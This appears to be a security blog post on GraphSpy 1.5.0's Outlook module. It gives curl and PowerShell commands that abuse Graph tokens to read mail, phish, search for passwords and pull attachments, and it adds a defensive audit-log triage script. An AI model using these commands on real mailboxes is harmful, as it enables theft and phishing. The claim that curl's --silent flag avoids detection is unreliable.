GraphSpy 1.5.0 introduces a powerful new Outlook Graph module, enabling security professionals to leverage Microsoft Graph access tokens for advanced email operations during penetration testing.
🔗 Download/Info: GraphSpy GitHub
You Should Know:
1. Listing & Reading Emails
Use a Microsoft Graph access token to fetch emails directly from a target mailbox.
Example using curl with the Graph API:

```bash
# List messages in the signed-in user's mailbox
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://graph.microsoft.com/v1.0/me/messages"
```
2. Sending HTML-Formatted Emails
GraphSpy now allows sending phishing or test emails via Microsoft Graph.
Send email via the Graph API:

```bash
curl -X POST -H "Authorization: Bearer <ACCESS_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"message":{"subject":"Test","body":{"contentType":"HTML","content":"<h1>Test Email</h1>"},"toRecipients":[{"emailAddress":{"address":"[email protected]"}}]}}' \
  "https://graph.microsoft.com/v1.0/me/sendMail"
```
3. Accessing Shared Mailboxes
Exploit shared mailbox permissions for lateral movement.
List shared mailboxes:

```bash
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://graph.microsoft.com/v1.0/users/<user_id>/mailFolders"
```
4. Searching for Sensitive Data
Use custom queries to hunt for passwords or confidential data.
PowerShell Graph query for sensitive keywords:

```powershell
$query = "subject:'password' OR body:'credentials'"
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me/messages?`$search=`"$query`"" -Headers @{Authorization="Bearer <ACCESS_TOKEN>"}
```
5. Extracting Attachments
Download email attachments for further analysis.
Get attachment IDs, then download a single attachment:

```bash
# Get attachment IDs
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://graph.microsoft.com/v1.0/me/messages/<message_id>/attachments"

# Download attachment
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://graph.microsoft.com/v1.0/me/messages/<message_id>/attachments/<attachment_id>/\$value" --output file.txt
```
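Every operation above (reading items, syncing a mailbox, delegate access to another user's mailbox, and sending mail) is recorded by Exchange mailbox auditing in the Microsoft 365 Unified Audit Log. The Python below is an added example for defenders, not code from GraphSpy or the original post: it triages audit records for the signals those operations leave behind. Field names (`Operation`, `ClientAppId`, `LogonType`, `MailboxOwnerUPN`, `OperationProperties` with `MailAccessType`/`IsThrottled`) follow the documented mailbox-audit schema; the record values, the `KNOWN_APP_IDS` allowlist and the `ROGUE_APP_ID` value are constructed placeholders.

```python
"""Triage Exchange mailbox-audit records for unexpected Graph mail access.

Flags four patterns: a client application id outside the approved list,
throttled (bulk) MailItemsAccessed, delegate access to someone else's
mailbox, and mail sent through an unapproved app.
"""
import json
from collections import Counter

# Constructed placeholders: a real deployment loads the tenant's approved app ids.
KNOWN_APP_IDS = {"00000000-aaaa-0000-0000-000000000001"}
ROGUE_APP_ID = "11111111-2222-3333-4444-555555555555"  # constructed, not a real app

SEND_OPERATIONS = {"Send", "SendAs", "SendOnBehalf"}
LOGON_TYPE_DELEGATE = 2  # mailbox audit LogonType: 0 owner, 1 admin, 2 delegate

# Constructed sample records (values made up; field names per the audit schema).
SAMPLE_AUDIT_RECORDS = [
    {   # owner reading own mail through an approved client: expected
        "CreationTime": "2024-05-01T08:00:00", "Operation": "MailItemsAccessed",
        "UserId": "alice@example.com", "MailboxOwnerUPN": "alice@example.com",
        "LogonType": 0, "ClientAppId": "00000000-aaaa-0000-0000-000000000001",
        "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                                {"Name": "IsThrottled", "Value": "False"}]},
    {   # same user, unapproved app, bulk sync of the mailbox
        "CreationTime": "2024-05-01T08:05:00", "Operation": "MailItemsAccessed",
        "UserId": "alice@example.com", "MailboxOwnerUPN": "alice@example.com",
        "LogonType": 0, "ClientAppId": ROGUE_APP_ID,
        "OperationProperties": [{"Name": "MailAccessType", "Value": "Sync"},
                                {"Name": "IsThrottled", "Value": "True"}]},
    {   # delegate access to a shared mailbox from the same unapproved app
        "CreationTime": "2024-05-01T08:07:00", "Operation": "MailItemsAccessed",
        "UserId": "alice@example.com", "MailboxOwnerUPN": "finance@example.com",
        "LogonType": 2, "ClientAppId": ROGUE_APP_ID,
        "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                                {"Name": "IsThrottled", "Value": "False"}]},
    {   # mail sent through the same unapproved app
        "CreationTime": "2024-05-01T08:09:00", "Operation": "Send",
        "UserId": "alice@example.com", "MailboxOwnerUPN": "alice@example.com",
        "LogonType": 0, "ClientAppId": ROGUE_APP_ID, "OperationProperties": []},
]


def load_records(text):
    """Parse a JSON array of audit rows; Search-UnifiedAuditLog exports carry
    the record as a JSON string in an 'AuditData' property, so unwrap it."""
    rows = json.loads(text)
    return [json.loads(r["AuditData"]) if isinstance(r.get("AuditData"), str) else r
            for r in rows]


def _props(record):
    """Flatten the OperationProperties name/value list into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("OperationProperties", [])}


def triage_record(record, known_app_ids=KNOWN_APP_IDS):
    """Return the reasons one audit record looks suspicious (empty if none)."""
    reasons = []
    op = record.get("Operation", "")
    unknown_app = record.get("ClientAppId", "") not in known_app_ids
    if unknown_app:
        reasons.append("unknown-client-app")
    if op == "MailItemsAccessed":
        props = _props(record)
        if props.get("IsThrottled") == "True":   # Microsoft throttles bulk binds
            reasons.append("throttled-bulk-access")
        if props.get("MailAccessType") == "Sync" and unknown_app:
            reasons.append("sync-from-unknown-app")
        if (record.get("LogonType") == LOGON_TYPE_DELEGATE
                and record.get("MailboxOwnerUPN") != record.get("UserId")):
            reasons.append("delegate-access-to-other-mailbox")
    elif op in SEND_OPERATIONS and unknown_app:
        reasons.append("send-from-unknown-app")
    return reasons


def triage(records, known_app_ids=KNOWN_APP_IDS):
    """Run triage_record over every record and keep the ones with findings."""
    findings = []
    for r in records:
        reasons = triage_record(r, known_app_ids)
        if reasons:
            findings.append({"time": r.get("CreationTime"), "user": r.get("UserId"),
                             "mailbox": r.get("MailboxOwnerUPN"),
                             "app": r.get("ClientAppId"),
                             "operation": r.get("Operation"), "reasons": reasons})
    return findings


def summarize_by_app(findings):
    """Count findings per (user, app id) so one rogue token stands out."""
    return Counter((f["user"], f["app"]) for f in findings)


if __name__ == "__main__":
    for f in triage(SAMPLE_AUDIT_RECORDS):
        print(f["time"], f["user"], "->", f["mailbox"], f["operation"], f["reasons"])
    print(summarize_by_app(triage(SAMPLE_AUDIT_RECORDS)))
```

Grouping by `(user, app)` is the useful pivot: a stolen or replayed token shows up as one unfamiliar application id touching mail, syncing in bulk, reaching shared mailboxes and sending, all within minutes, which is exactly the sequence in the four constructed records.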
What Undercode Say
GraphSpy 1.5.0 enhances red teaming capabilities by integrating Microsoft Graph API exploitation into a single tool. Key takeaways:
– Token Abuse: Steal or forge Graph tokens to access emails.
– Lateral Movement: Use shared mailboxes to escalate access.
– Data Exfiltration: Extract sensitive emails and attachments.
– Phishing: Send realistic HTML emails for social engineering.
Relevant Commands & Tools
- Linux: `jq` for parsing JSON responses (`curl ... | jq .`)
- Windows: `Invoke-WebRequest` for Graph API interactions
- OAuth Exploitation: Use `mitm6` + `ntlmrelayx` for token theft
- Logging Avoidance: `--silent` flag in `curl` to minimize detection
Expected Output:
A successful GraphSpy execution should return:
- Email metadata (subjects, senders, dates)
- Extracted attachments (PDFs, documents)
- Confirmation of sent phishing emails
- Shared mailbox access proofs
For advanced exploitation, always test in controlled environments before real engagements.
🔗 Explore More: Microsoft Graph API Docs
References:
Reported By: Keanunys Graphspy – Hackers Feeds